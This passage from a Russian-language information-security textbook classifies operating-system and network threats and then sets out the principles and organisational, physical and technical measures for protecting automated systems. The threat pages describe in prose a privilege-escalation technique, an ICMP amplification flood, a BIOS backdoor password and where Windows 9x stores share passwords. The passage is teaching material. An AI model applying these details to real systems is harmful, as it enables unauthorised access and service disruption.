62 Угрозы, позволяющие обойти установленные разграничения прав доступа К третьей группе угроз можно отнести примеры, основывающиеся на недоработках (ошибках) в ядре и системных утилитах ОС, позволя- ющих программными методами обходить установленные разграничения доступа к объектам системы. Примеры ошибок, составляющих эту группу, немногочисленны, т.к. требуют детального анализа работы механизмов (функций API) ОС и соответствующей квалификации нарушителя. При этом нужно учиты- вать, что при рассмотрении коммерческих ОС (не имеющих общедо- ступных исходных текстов) данный анализ сильно затруднен, поскольку производители, по понятным причинам, крайне неохотно документиру- ют внутреннюю архитектуру систем. В качестве примера для данной группы можно привести известную программу "GetAdmin", реализующую получение администраторских прав, используя некорректную работу функции NTAddAtom, позволяю- щую записывать значения в любую область адресного пространства. В системе Windows NT есть некий глобальный флаг NtGlobalFlag, имеющий адрес примерно 0х801ХХХХХ. Изменением одного из битов этого флага существует возможность превратить Windows NT в Windows NT Checked Build. В результате право "SeDebugPrivilege" не будет необходимо для внедрения в системные процессы. Далее, внедряя свой исполняемый код (для чего нужна была привилегия "SeDebugPrivilege") в системные процессы, можно обойти любые огра- ничения, связанные с политикой безопасности (в данном случае созда- вался пользователь с администраторскими правами). Угрозы, приводящие к отказу в обслуживании (Denial of Service — системный сбой) К этой группе можно отнести угрозы, приводящие к отказу в об- служивании (системный сбой). Большую часть этой группы составляют примеры, основанные на недостаточной надежности реализации стека сетевых протоколов ОС. Сбои в работе ОС достигаются посылкой групп пакетов с некорректными заголовками, параметрами и т.п. Примерами подобных программ служат: teardrop jolt/jolt2 lornuke winnuke winfreez win95ping и др. Другую часть этой группы составляют угрозы, не использующие напрямую (или совсем не использующие) детали реализации стека сете-
63 вых протоколов конкретной ОС. Они провоцируют отказ в обслуживании путем чрезмерной загрузки канала. Простейшим примером может слу- жить посылка большого количества пакетов из источника, обладающего более скоростным каналом, приемнику, обладающему менее скоростным каналом. Таким образом, полностью исчерпывается ресурс приемника, приводя к его полному или частичному отказу в обслуживания. Более сложным примером является так называемый флудер- множитель. При отправке на удаленный хост сообщения, состоящего из 20-и байт IP-заголовка, в поле Protocol которого содержится значение 00 (что соответствует IPPROTORAW), удаленная система (или ближайший к провоцируемой системе маршрутизатор), получив такое сообщение, ответит сообщением ICMP-Destination Unreachable-Protocol Unreachable, длиной от 68 до 84 байт. Очевидно, что, заменяя Source Address на адрес атакуемого, провоцируется поток с коэффициентом умножения 4 (если рассчитывать динамическое сжатие, то много больше). Следует отметить, что программы, представляющие данную груп- пу, не нарушают напрямую безопасность атакуемой системы, а просто выводят ее из строя. Но можно представить себе пример более сложных атак, где угрозами, приводящими к отказу от обслуживания, можно устранять, например, реально действующие в системе узлы, а затем от их имени получать несанкционированный доступ к защищенным дан- ным. Угрозы, использующие встроенные недокументированные возмож- ности (закладки) К пятой группе можно отнести методы, использующие встроенные недокументированные возможности (закладки). К таким закладкам от- носятся: встроенные инженерные пароли для входа в систему; специальные возможности (последовательность действий) для недокументированных действий (например, в одном из хранителей экрана фирмы Microsoft присутствует сетевой код); закладки в разнообразных прикладных приложениях и т.п. Примером использования встроенного инженерного пароля может служить широко известный пароль фирмы Award "AWARDSW", позво- ляющий получить весь спектр прав для работы с BIOS.
64 Угрозы, использующие недостатки системы хранения или выбора (недостаточная длина) данных об аутентификации (пароли) К шестой группе можно отнести угрозы, использующие недостатки системы хранения или выбора (недостаточная длина) данных об аутен- тификации (пароли) и позволяющие путем реверсирования, подбора или полного перебора всех вариантов получить эти данные. Эти программы основываются на недостатках алгоритмов кодирования (хеширования) паролей на защищаемые ресурсы или на вход в ОС. Примером может служить реализация защиты разделяемых ресур- сов в Windows 9Х, где при разграничении доступа на уровне ресурса (по паролю), пароль для доступа хранится в реестре (HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\ <ИMЯ КАТАЛОГА>, в ключе ParmlEnc), зашифрованный с помощью алгоритма, который легко поддается расшифровке, поэтому легко полу- чить исходный пароль. Также неудачен сам алгоритм аутентификации в Windows 9Х через NETBIOS. Если клиент посылает вместо полного пароля открытым тек- стом только его первый символ (байт), то при совпадении этого символа пароль считается правильным. Следует отметить, что существует большое количество программ (не только для ОС семейства MS Windows), предназначенных для пере- бора паролей по различным алгоритмам, учитывающим слабость реали- зации систем аутентификации и выбора паролей. К таким программам относятся: L0phtcrack; pwlhack; pwlview; John the Ripper и др. "Троянские" программы Это программы, которые прописываются в автозагрузку ОС или подменяют собой системные компоненты (утилиты) ОС и выполняют несанкционированные действия. Для того, чтобы такая программа по- явилась в системе, пользователь должен сам (преднамеренно, либо нет) первоначально выполнить ее. Обычно "троянские" программы распространяются под видом по- лезных утилит (в том числе они могут присутствовать и в некоммерче- ских средствах добавочной защиты информации), посылаются по почте в виде присоединяемых замаскированных исполняемых файлов, скриптов, устанавливаются злоумышленником на защищаемом компьютере вруч- ную и т.п. После первого запуска программа заменяет собой часть си- стемных файлов или просто добавляет себя в список загрузки и предо- ставляет нарушителю доступ к системе или защищаемым ресурсам. При-
65 мером подменяющей программы может служить динамическая библиоте- ка клиента Novell NetWare для ОС Windows NT "FPNWCLNT.DLL", пе- рехватывающая и хранящая передаваемые пароли в открытом виде. Дру- гие программы из этой группы: BackOrifice; Net Bus; Priority и др. Прочие угрозы К последней группе отнесем все остальные угрозы и программные реализации, влияющие на функционирование и безопасность автомати- зированной системы. В частности, большую часть угроз данной группы составляют всевозможные программы-сниферы, позволяющие в пассив- ном режиме "прослушивать" каналы ввода/вывода, передачи и обработ- ки данных. Например, сюда можно отнести сниферы клавиатуры — про- граммы, устанавливаемые злоумышленником на защищаемый объект, с целью "прослушивания" канала ввода пароля (пароль с клавиатуры вво- дится в открытом виде, соответственно, в открытом виде снимается снифером). Отдельно отметим сниферы канала — программы, устанав- ливаемые на какой-либо компьютер в ЛВС и "прослушивающие" весь трафик в канале (особенно это критично для ЛВС, не реализующих фи- зической сегментации канала связи). Из приведенного анализа можно сделать следующий важный вы- вод: угрозы, описанные в большинстве групп, напрямую использу- ют различные недостатки ОС и системных приложений и позволя- ют при полностью сконфигурированных и работающих встроенных в ОС механизмах защиты осуществлять НСД, что подтверждает необходимость усиления встроенных механизмов защиты. Кроме того, анализируя представленную статистику угроз, можно сделать вывод, что большая их часть связана именно с недостатками средств защиты ОС, отмеченными выше, т.е. недостатками, связанными с невыполнением (полным, либо частичным) формализованных требований к защите, среди которых, в первую очередь, могут быть выделены: Некорректная реализация механизма управления доступом, прежде всего при разграничении доступа к защищаемым объектам систем- ных процессов и пользователей, имеющих права администратора. Отсутствие обеспечения замкнутости (целостности) программной среды. Как мы видим, большинство атак осуществлялось либо с использованием некоторых прикладных программ, либо с приме- нением встроенных в виртуальные машины средств программиро- вания. То есть, возможность большинства атак напрямую связана с возможностью запуска злоумышленником соответствующей про-
66 граммы. При этом запуск может быть осуществлен как явно, так и скрыто, в рамках возможностей встроенных в приложения интер- претаторов команд. Далее, можно сделать еще один вывод: проведенный анализ из- вестных угроз современным универсальным ОС полностью под- тверждает, что большая их часть обусловлена именно реализуемым в ОС концептуальным подходом, состоящим в реализации схемы распределенного администрирования механизмов защиты [28]. В рамках этой схемы пользователь рассматривается как доверенное лицо, являющееся элементом схемы администрирования и имеющее возмож- ность назначать/изменять правила разграничения доступа. При этом он не воспринимается как потенциальный злоумышленник, который может сознательно или несознательно осуществить НСД к информации. Отсю- да можем сделать и вывод об основном назначении механизмов доба- вочной защиты ОС — реализация централизованной схемы администри- рования механизмов защиты, в рамках которой будет осуществляться противодействие НСД пользователя к информации.
1.9.3. Атаки на уровне сетевого программного обеспечения
Сетевое программное обеспечение является наиболее уязвимым,
потому что канал связи, по которому передаются сообщения, чаще всего не защищен, и всякий, кто может иметь доступ к этому каналу, соответ- ственно, может перехватывать сообщения и отправлять свои собствен- ные. Поэтому на уровне СПО возможны следующие хакерские атаки: прослушивание сегмента локальной сети (в пределах одного и то- го же сегмента локальной сети любой подключенный к нему ком- пьютер в состоянии принимать сообщения, адресованные другим компьютерам сегмента, а следовательно, если компьютер хакера подсоединен к некоторому сегменту локальной сети, то ему стано- вится доступен весь информационный обмен между компьютера- ми этого сегмента); перехват сообщений на маршрутизаторе (если хакер имеет приви- легированный доступ к сетевому маршрутизатору, то он получает возможность перехватывать все сообщения, проходящие через этот маршрутизатор, и хотя тотальный перехват невозможен из-за слишком большого объема, чрезвычайно привлекательным для ха- кера является выборочный перехват сообщений, содержащих па- роли пользователей и их электронную почту);
67 создание ложного маршрутизатора (путем отправки в сеть сооб- щений специального вида хакер добивается, чтобы его компьютер стал маршрутизатором сети, после чего получает доступ ко всем проходящим через него сообщениям); навязывание сообщений (отправляя в сеть сообщения с ложным обратным сетевым адресом, хакер переключает на свой компьютер уже установленные сетевые соединения и в результате получает права пользователей, чьи соединения обманным путем были пере- ключены на компьютер хакера); отказ в обслуживании (хакер отправляет в сеть сообщения специ- ального вида, после чего одна или несколько АС, подключенных к сети, полностью или частично выходят из строя). Поскольку атаки на уровне СПО спровоцированы открытостью се- тевых соединений, разумно предположить, что для отражения этих атак необходимо максимально защитить каналы связи и тем самым затруд- нить обмен информацией по сети для тех, кто не является легальным пользователем. Ниже перечислены некоторые способы такой защиты: максимальное ограничение размеров вычислительной сети (чем больше сеть, тем труднее ее защитить); изоляция сети от внешнего мира (по возможности следует огра- ничивать физический доступ к вычислительной сети извне, чтобы уменьшить вероятность несанкционированного подключения ха- кера); шифрование сетевых сообщений (тем самым можно устранить угрозу перехвата сообщений, правда, за счет снижения производи- тельности СПО и роста накладных расходов); электронная цифровая подпись сетевых сообщений (если все со- общения, передаваемые по вычислительной сети, снабжаются электронной цифровой подписью, и при этом неподписанные со- общения игнорируются, то можно забыть про угрозу навязывания сообщений и про большинство угроз, связанных с отказом в об- служивании); использование межсетевых экранов (межсетевой экран является вспомогательным средством защиты, применяемым только в том случае, если вычислительную сеть нельзя изолировать, от других сетей, поскольку межсетевой экран довольно часто не способен отличить потенциально опасное сетевое сообщение от совершенно безвредного, и в результате типичной является ситуация, когда
68 межсетевой экран не только не защищает сеть от хакерских атак, но и даже препятствует ее нормальному функционированию). Для построения системы информационной безопасности необходи- мо четко представлять задачи, решаемые ею в процессе функционирова- ния АС, и принципы ее построения.
69 2. ОСНОВЫ ПОСТРОЕНИЯ СИСТЕМ И МОДЕЛИ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ АС 2.1. Основные принципы построения систем защиты АС В процессе развития работ по защите информации формировались общеметодологические принципы построения и функционирования СЗИ. Соблюдение требований таких принципов в общем случае способ- ствует повышению эффективности защиты. Сформированная к настоя- щему времени система включает следующий перечень общеметодологи- ческих принципов: системности, комплексности; непрерывности защиты; разумной достаточности; гибкости управления и применения: простоты применения защитных мер и средств.
Принцип системности Системный подход к защите АС предполагает необходимость учета всех взаимосвязанных, взаимодействующих и изменяющихся во време- ни элементов, условий и факторов, важных для понимания и решения проблемы обеспечения безопасности АС. При создании системы защиты необходимо учитывать все слабые, уязвимые места системы обработки информации; характер, возможные объекты и направления атак на систему со стороны нарушителей (особенно высококвалифицированных злоумыш- ленников); пути проникновения в распределенные системы и НСД к информа- ции. Система защиты должна строиться с учетом не только всех извест- ных каналов проникновения и НСД к информации, но и с учетом воз- можности появления в будущем принципиально новых путей реализа- ции угроз безопасности. Принцип комплексности В распоряжении специалистов по информационной безопасности имеется большое количество мер, методов и средств защиты АС. Ком-
70 плексное их использование предполагает согласованное применение разнородных средств при построении целостной системы защиты. Такая система должна перекрывать все существенные каналы реализации угроз и не содержать слабых мест на стыках отдельных ее компонентов. Защита должна строиться эшелонировано (по уровням). Внешняя защита должна обеспечиваться физическими средствами, организацион- ными и правовыми мерами. Одной из наиболее укрепленных линий обо- роны являются средства защиты, реализованные на уровне операцион- ных систем, так как они управляют всеми ресурсами компьютерной си- стемы. Прикладной уровень защиты, учитывающий особенности пред- метной области, представляет внутренний рубеж обороны. Принцип непрерывности защиты Защита информации - это не разовое мероприятие и даже не опре- деленная совокупность проведенных мероприятий и установленных средств защиты. Это непрерывный целенаправленный процесс, предпо- лагающий принятие соответствующих мер на всех этапах жизненного цикла АС, начиная с самых ранних стадий проектирования. Разработка системы защиты должна вестись параллельно с разработкой самой за- щищаемой системы. Это позволит учесть требования безопасности при проектировании архитектуры и, в конечном счете, позволит создать эф- фективные (как по затратам ресурсов, так и по стойкости) защищенные системы. Большинству физических и технических средств защиты для эффективного выполнения своих функций необходима постоянная орга- низационная (административная) поддержка (своевременная смена и обеспечение правильного хранения и применения имен, паролей, клю- чей шифрования, переопределение полномочий и т.п.). Перерывы в ра- боте средств защиты могут быть использованы злоумышленниками для анализа применяемых методов и средств защиты, для внедрения специ- альных программных и аппаратных "закладок" и других средств преодо- ления системы защиты. Разумная достаточность Создать абсолютно непреодолимую систему защиты принципиаль- но невозможно. При достаточном количестве времени и средств можно преодолеть любую защиту. Поэтому имеет смысл вести речь только о некотором приемлемом уровне безопасности. Высокоэффективная си- стема защиты стоит дорого, использует при работе существенную часть мощности и ресурсов компьютерной системы и может создавать ощути- мые дополнительные неудобства пользователям. Важно правильно вы-
71 брать тот достаточный уровень зашиты, при котором затраты, риск и размер возможного ущерба были бы приемлемыми. Гибкость системы защиты Часто системы защиты создаются в условиях большой неопреде- ленности. Поэтому принятые меры и установленные средства зашиты, особенно в начальный период их эксплуатации, могут обеспечивать как чрезмерный, так и недостаточный уровень защиты. Естественно, что для обеспечения возможности изменения уровня защищенности средства защиты должны обладать определенной гибкостью. Это свойство явля- ется особенно важным, когда установку средств защиты необходимо осуществлять на работающую систему, не нарушая процесса ее нор- мального функционирования. Кроме того, условия внешней среды и требования с течением времени меняются. В таких ситуациях свойство гибкости спасает владельцев АС от необходимости принятия карди- нальных мер по полной замене средств защиты на новые. Принцип простоты применения средств защиты Механизмы защиты должны быть интуитивно понятны и просты в использовании. Применение средств защиты не должно быть связано со знанием специальных языков или с выполнением действий, требующих значительных дополнительных трудозатрат при обычной работе закон- ных пользователей. Кроме этого от пользователя не должно требоваться выполнение рутинных малопонятных ему операций (ввод нескольких паролей и имен и т.д.).
2.2. Задачи системы защиты информации и меры их ре-
ализации По результатам анализа возможных угроз АС можно сформулиро- вать перечень основных задач, которые должны решаться системой за- щиты информации [3]: управление доступом пользователей к ресурсам АС. Это необхо- димо для защиты от неправомерного случайного или умышленно- го вмешательства в работу системы и несанкционированного до- ступа к ее информационным, программным и аппаратным ресур- сам со стороны посторонних лиц, а также лиц из числа персонала учреждения и пользователей; защита данных, передаваемых по каналам связи;
72 регистрация, сбор, хранение, обработка и выдача сведений обо всех событиях, происходящих в системе и имеющих отношение к ее безопасности; контроль работы пользователей со стороны администрации и опе- ративное оповещение администратора безопасности о попытках несанкционированного доступа к ресурсам системы; контроль и поддержание целостности критичных ресурсов систе- мы защиты и среды исполнения прикладных программ; защита от бесконтрольного внедрения в систему средств преодо- ления защиты и потенциально опасных программ (в которых мо- гут содержаться вредоносные закладки, компьютерные вирусы или опасные ошибки); управление средствами системы защиты. Меры противодействия угрозам безопасности По способам осуществления все меры обеспечения безопасности информационных систем подразделяются на: морально-этические; правовые (законодательные); организационные (административные); физические и технические (аппаратурные и программные). К морально-этическим мерам противодействия относятся нормы поведения, которые традиционно сложились или складываются по мере распространения ЭВМ в стране или обществе. Эти нормы в основном не являются обязательными, однако, их несоблюдение ведет обычно к па- дению авторитета и престижа человека, группы лиц или учреждения. Морально-этические нормы бывают неписаными (например, общепри- знанные нормы честности, патриотизма и т.п.) и писаными, то есть оформленные в некоторый свод (устав) правил или предписаний. К правовым мерам защиты относятся действующие в стране зако- ны, указы и нормативные акты. В них регламентируются правила обра- щения с информацией, закрепляются права и обязанности участников информационных отношений в процессе ее обработки и использования, а также устанавливается ответственность за нарушения этих правил. Та- ким образом, эти меры препятствуют неправомерному использованию информации и являются сдерживающим фактором для потенциальных нарушителей. Законодательные и морально-этические меры защиты являются универсальными в том смысле, что принципиально применимы для всех каналов проникновения и НСД к АС и информации. В некоторых случа-
73 ях они являются единственно применимыми, как, например, при защите открытой информации от незаконного тиражирования или при защите от злоупотреблений служебным положением при работе с информацией. Организационные (административные) меры защиты - это ме- ры, которые регламентируют процессы функционирования системы об- работки данных, использование ее ресурсов, деятельность персонала и порядок взаимодействия пользователей с системой. Эти меры способ- ствуют тому, чтобы в наибольшей степени затруднить или исключить возможность реализации угроз безопасности. Они включают: мероприятия по разработке правил доступа пользователей к ре- сурсам системы (разработка политики безопасности); подбор и подготовку персонала системы; организацию охраны и надежного пропускного режима; организацию учета, хранения, использования и уничтожения до- кументов и носителей с информацией; распределение реквизитов разграничения доступа (паролей, клю- чей шифрования и т. п.); организацию явного и скрытого контроля за работой пользовате- лей. Организационные меры - это единственное, что остается, когда дру- гие методы и средства защиты отсутствуют или не могут обеспечить требуемый уровень безопасности. Однако это вовсе не означает, что си- стему защиты необходимо строить исключительно на их основе, как это часто пытаются сделать чиновники, далекие от технического прогресса. Этим мерам присущи серьезные недостатки, такие как: низкая надежность без соответствующей поддержки физическими, техническими и программными средствами. Это объясняется тем, что многие люди склонны к нарушению любых установленных ограничений и правил, если возникают условия для нарушения; дополнительные неудобства, связанные с большим объемом ру- тинной формальной работы (многочисленные правила и инструк- ции надо писать, поддерживать их в актуальном состоянии и по- стоянно следить за их выполнением). Организационные меры необходимы для обеспечения эффективно- го применения других мер и средств защиты в части, касающейся регла- ментации действий людей. В то же время организационные меры необ- ходимо поддерживать более надежными физическими и техническими средствами. Физические меры защиты основаны на применении различных ме-
74 ханических, электро- или электронно-механических устройств и соору- жений. Они специально предназначены для создания физических пре- пятствий на возможных путях проникновения и доступа потенциальных нарушителей к компонентам системы и защищаемой информации. К ним относятся также технические средства визуального наблюдения, связи и охранной сигнализации. Технические (аппаратно-программные) меры защиты основаны на использовании различных электронных устройств и специальных программ, входящих в состав АС и выполняющих (самостоятельно или в комплексе с другими средствами) функции защиты такие как: идентификацию и аутентификацию пользователей; разграничение доступа к ресурсам; регистрацию событий; криптографическое закрытие информации и т.д. Физические и технические средства защиты призваны устранить недостатки организационных мер, поставить прочные барьеры на пути злоумышленников и в максимальной степени исключить возможность неумышленных ошибочных нарушений обслуживающего персонала и пользователей системы. Взаимосвязь рассмотренных выше мер обеспечения безопасности приведена на рис. 12.
Рис. 12. Взаимосвязь мер обеспечения безопасности
Организационные меры обеспечивают исполнение нормативных актов и строятся с учетом существующих морально-этических правил поведения, принятых в стране и/или учреждении. Воплощение организационных мер требует создания нормативных документов.
75 Для эффективного применения организационные меры должны быть поддержаны физическими и техническими средствами. Применение и использование технических средств защиты требует соответствующей организационной поддержки.
2.3. Методы и средства обеспечения информационной
безопасности Обеспечение информационной безопасности строится на совокуп- ности методов, включающей в себя организационные, технические, про- граммные составляющие. На первом этапе развития концепций обеспечения безопасности информации преимущество отдавалось программным средствам защи- ты. По мере формирования системного подхода к проблеме обеспечения безопасности информации, возникла необходимость комплексного при- менения различных методов защиты и созданных на их основе средств и механизмов защиты. Поэтому, различают четыре основных группы методов обеспечения информационной безопасности АС: Организационные методы. Инженерно-технические методы. Технические методы. Программно-аппаратные методы. Организационные методы - ориентированы на работу с персоналом, рассматривают выбор местоположения и размещения объектов ЗАС, ор- ганизацию системы физической и пожарной безопасности, осуществле- ние контроля, возложение персональной ответственности за выполнение мер защиты, кадровые вопросы. Инженерно-технические методы - связаны с построением инженер- ных сооружений и коммуникаций, учитывающих требования безопасно- сти. Это как правило дорогостоящие решения и они наиболее эффектив- но реализуются на этапе строительства или реконструкции объекта. Их реализация способствует повышению общей живучести АС и дают вы- сокий эффект против некоторых типов угроз. Реализация техногенных и стихийных угроз наиболее эффективно предотвращается инженерно- техническими методами. Технические методы - связаны с применением специальных техни- ческих средств защиты информации и контроля обстановки; они дают значительный эффект при устранении угроз, связанных с действиями криминогенных элементов по добыванию информации незаконными
76 техническими средствами. Технические методы дают значительный эф- фект по отношению к техногенным факторам, например резервирование каналов и резервирование архивов данных. Программно-аппаратные методы - направлены на устранение угроз, непосредственно связанных с процессом обработки и передачи инфор- мации. Без этих методов невозможно построить целостную комплекс- ную защищенную АС. Наибольший эффект дает оптимальное сочетание выше перечис- ленных методов противодействия реализации угроз, информационной безопасности. Рассмотрим более подробно основные методы защиты информации классифицируемые по характеру реализации По характеру реализации методов обеспечения безопасности их можно классифицировать следующим образом: управление; препятствия; маскировка; регламентация, побуждение; принуждение Управление представляет собой регулирование использования всех ресурсов системы в рамках установленного технологического цик- ла обработки и передачи данных, где в качестве ресурсов рассматрива- ются технические средства, ОС, программы, БД, элементы данных и т.п. Управление защитой информации реализует процесс целенаправленного воздействия подсистемы управления СОБД на средства и механизмы защиты информации и компоненты АС с целью обеспечения безопасно- сти данных. Препятствия физически преграждают нарушителю путь к защи- щаемым данным. Маскировка представляет собой метод защиты информации пу- тем их криптографического закрытия. Регламентация заключается в разработке и реализации в процес- се функционирования АС комплексов мероприятий, создающих такие условия технологического цикла обработки данных, при которых мини- мизируется риск НСД к данным. Регламентация охватывает как струк- турное построение АС, так и технологию обработки данных, организа- цию работы пользователей и персонала сети.
77 Побуждение состоит в создании такой обстановки и условий, при которых правила обращения с защищенными данными регулируются моральными и нравственными нормами. Принуждение включает угрозу материальной, административной и уголовной ответственности за нарушение правил обращения с защи- щенными данными. На основе перечисленных методов создаются средства обеспече- ния информационной безопасности.
2.3.1. Формальные средства защиты
Формальными называются такие средства защиты, которые вы-
полняют свои функции по заранее установленным процедурам без вме- шательства человека. К формальным средствам защиты относятся технические и про- граммные средства. К техническим средствам защиты относятся все устройства, ко- торые предназначены для защиты данных. В свою очередь, технические средства защиты можно разделить на физические и аппаратные. Физическими называются средства защиты, которые создают фи- зические препятствия на пути к защищаемым данным и не входят в со- став аппаратуры АС, а аппаратными - средства защиты данных, непо- средственно входящие в состав аппаратуры АС. Программными называются средства защиты данных, функцио- нирующие в составе программного обеспечения АС. Отдельную группу формальных средств составляют криптографи- ческие средства, которые реализуются в виде программных, аппаратных и программно-аппаратных средств защиты. Классификация средств защиты данных с учетов методов реализа- ция представлена на рис. 13.
78 Рис. 13. Классификация средств обеспечения информа- ционной безопасности
Рассмотрим подробнее формальные средства обеспечения инфор-
мационной безопасности. Физические средства защиты Физические средства защиты выполняют следующие основные функции: 1) охрана территории и зданий; 2) охрана внутренних помещений; 3) охрана оборудования и наблюдение за ним; 4) контроль доступа в защищаемые зоны; 5) нейтрализация излучений и наводок; 6) создание препятствий визуальному наблюдению и подслушива- нию; 7) противопожарная защита; 8) блокировка действий нарушителя и т.п. Для предотвращения проникновения нарушителей на охраняемые объекты применяются следующие технические устройства: - сверхвысокочастотные, ультразвуковые и инфракрасные систе- мы;
79 - лазерные и оптические системы; - телевизионные системы; - кабельные системы; - системы защиты окон и дверей. Сверхвысокочастотные, ультразвуковые и инфракрасные систе- мы предназначены для обнаружения движущихся объектов, определения их размеров, скорости и направления перемещения. Принцип их дей- ствия основан на изменении частоты отраженного от движущегося объ- екта сигнала. Инфракрасные системы бывают активными и пассивными. Актив- ные системы содержат источник излучения и его приемник. Функцио- нирование пассивных систем основано на фиксации теплового излуче- ния ИК-датчиками. Ультразвуковые и инфракрасные системы применяются, главным образом, внутри помещений. СВЧ системы могут применяться как внут- ри помещений, так и для охраны зданий и территории. Лазерные и оптические системы, работающие в видимой части спектра, реагируют на пересечение нарушителями светового луча и применяются, в основном, внутри помещений. Телевизионные системы применяются для наблюдения как за тер- риторией охраняемого объекта, так и за обстановкой внутри помещений. Кабельные системы используются для охраны небольших объек- тов, обычно временно находящихся на территории, а также оборудова- ния внутри помещений. Они состоят из заглубленного кабеля, окружа- ющего защищаемый объект и излучающего радиоволны. Приемник из- лучения реагирует на изменение поля, создаваемого нарушителем. Системы защиты окон и дверей предназначены для препятствия механическому проникновению, а также для защиты от наблюдения и подслушивания. Регулирование доступа на территорию и в помещения может осу- ществляться и с помощью специальных замков, в том числе замков с управлением от микропроцессоров и ЭВМ и с содержанием микропро- цессоров. Для защиты от перехвата электромагнитного излучения применя- ются экранирование и зашумляющие генераторы излучений.
80 Организационные методы обеспечения информационной безопас- ности. Организационные методы обеспечения информационной безопас- ности заключаются в разработке и реализации административных и ор- ганизационно-технических мер при подготовке и эксплуатации системы. Организационные меры, по мнению специалистов, не смотря на по- стоянное совершенствование технических мер, составляют значитель- ную часть (более 50%) от всех мер, реализуемых в системах защиты информации. Они используются тогда, когда вычислительная система не может непосредственно контролировать использование информации. Кроме того, в некоторых ответственных случаях в целях повышения эф- фективности защиты полезно иногда технические меры продублировать организационными. Организационные меры по защите информации в АС представляют собой решения и процедуры, вырабатываемые руководством организа- ции (предприятия, фирмы). Хотя некоторые из этих мер могут опреде- ляться внешними факторами, например законами или правительствен- ными постановлениями, большинство проблем решается внутри органи- зации в конкретных условиях. В большинстве исследований, посвященных проблемам защиты ин формации, и в существующих публикациях основное внимание уделя- лось либо правовому аспекту и связанным с ним социальным и законо- дательным проблемам, либо техническим приемам решения специфиче- ских проблем защиты. По сравнению с ними организационным вопро- сам часто недоставало той четкой постановки, которая присуща техни- ческим проблемам. мероприятия по защите информации, которые проводятся проек- тировщиком, разработчиком и изготовителем в процессе создания системы и рассчитаны на защиту от утечки информации в данной организации; мероприятия, определенные в документации на систему, которые касаются принципов организации защиты в системе на период ввода и эксплуатации системы. Выполнение этих рекомендаций есть определенная гарантия за- щиты ин формации в АС. введение на необходимых участках проведения работ режима секретности;
81 разработка должностных инструкций по обеспечению режима секретности в соответствии с действующими в стране инструкци- ями и положениями; выделение (при необходимости) отдельных помещений с охран- ной сигнализацией и пропускной системой; разграничение задач по исполнителям и выпуску документации; присвоение грифа секретности материалам, документации, аппа- ратуре и хранение их под охраной в отдельных помещениях с уче- том и контролем доступа исполнителей; постоянный контроль соблюдения исполнителями установленного режима и соответствующих инструкций; установление и распределение ответственных лиц за недопущение утечки информации; другие меры, устанавливаемые главным конструктором при со- здании конкретной системы. В свою очередь организационные мероприятия должны быть опре- делены в инструкции по эксплуатации на периоды подготовки и эксплу- атации системы. при выделении территории, зданий и помещений обозначить кон- тролируемую зону вокруг размещения комплекса средств автома- тизации; установить и оборудовать охранную сигнализацию по границам контролируемой зоны; создать контрольно-пропускную систему; определить схему размещения и места установки аппаратуры АС; проверить состояние системы жизнеобеспечения людей, условия функционирования аппаратуры и хранения документации. перестройку структуры организации-потребителя в соответствии с потребностями внедряемой системы; подобрать кадры для тех- нического и оперативного обслуживания АС; при необходимости подобрать специальные кадры для работы по защите информации в АС и создать централизованную службу безопасности информации при руководстве организации- потребителе АС; провести обучение кадров; организовать распределение функциональных обязанностей и от- ветственности должностных лиц; установить полномочия должностных лиц по доступу к техниче- ским средствам и информации АС;
82 разработать должностные инструкции по выполнению функцио- нальных обязанностей технического, оперативного состава долж- ностных лиц, включая службу безопасности информации. постановку на учет аппаратуры, носителей информации и доку- ментации; проверку отсутствия посторонней аппаратуры; контроль размещения аппаратуры в соответствии с требованиями по разграничению доступа, побочного электромагнитного излуче- ния и электрических наводок; проверку функционирования подсистемы контроля вскрытия тех- нических устройств; проверку функционирования АС с помощью средств функцио- нального контроля; проверку на отсутствие посторонних коммуникаций, выходящих за пределы контролируемой зоны; проверку функционирования АС, включая систему защиты ин формации, автономно и в составе АС по специальным программам испытаний; тренировку оперативного состава должностных лиц, включая службу безопасности информации, по специальным программам. периодические проверки полномочий лиц, работающих на АС, допуск к обработке, хранению и передаче конфиденциальной ин- формации только проверенных должностных лиц; назначение конкретных образцов технических средств для обра- ботки ценной информации и дальнейшая работа только на них, ис- ключение просмотра посторонними лицами содержания обраба- тываемой информации за счет соответствующей установки дис- плея, клавиатуры, принтера и т.п.; хранение магнитных носителей, жестких копий и регистрацион- ных материалов в тщательно закрытых прочных шкафах (жела- тельно в сейфах); постоянный контроль за работой устройств вывода секретной ин- формации на материальный носитель; уничтожение (в установленном порядке) красящих лент, кассет, дискет, бумаги и иных материалов, содержащих фрагменты цен- ной информации; инспектирование правильности и полноты выполнения персона лом мер по обеспечению сохранности необходимых дубликатов файлов, библиотек программ, оборудования АС;
83 надзор за дозволенностью изменений программ и оборудования; стимулирование персонала в вопросах обеспечения защиты; разработку и обеспечение всех противопожарных мероприятий и обучение персонала действиям по тревоге и при стихийных бед- ствиях; консультирование всех сотрудников, работающих с АС, по вопро- сам обеспечения защиты информации. Технические методы обеспечения информационной безопасности. Технические методы обеспечения информационной безопасности основаны на достижении, прежде всего физической безопасности, кото- рая обеспечивается контролем физического доступа и безопасностью зданий, комнат и средств. Реализация этих методов выполняется по сле- дующим направлениям: Контроль физического доступа Безопасность офисов, комнат и средств Безопасность оборудования Месторасположение и защита оборудования Безопасность кабельной системы Безопасное уничтожение отработавшего оборудования Безопасность рабочего места
2.3.2. Программные средства обеспечения информационной
безопасности Для защиты персональных компьютеров используются различные программные методы, которые значительно расширяют возможности по обеспечению безопасности хранящейся информации. Среди стандарт- ных защитных средств персонального компьютера наибольшее распро- странение получили: средства защиты вычислительных ресурсов, использующие па- рольную идентификацию и ограничивающие доступ несанкциони- рованного пользователя; различные методов и средства шифрования данных, не зависящих от контекста информации; средства защиты от копирования коммерческих программных продуктов; средства защиты от компьютерных вирусов и создания архивов.
84 2.4. Организация защиты от случайных воздействий и аварийных ситуаций
2.4.1. Защита информации от случайных воздействий
В целях защиты функционирования АС от случайных воздействий
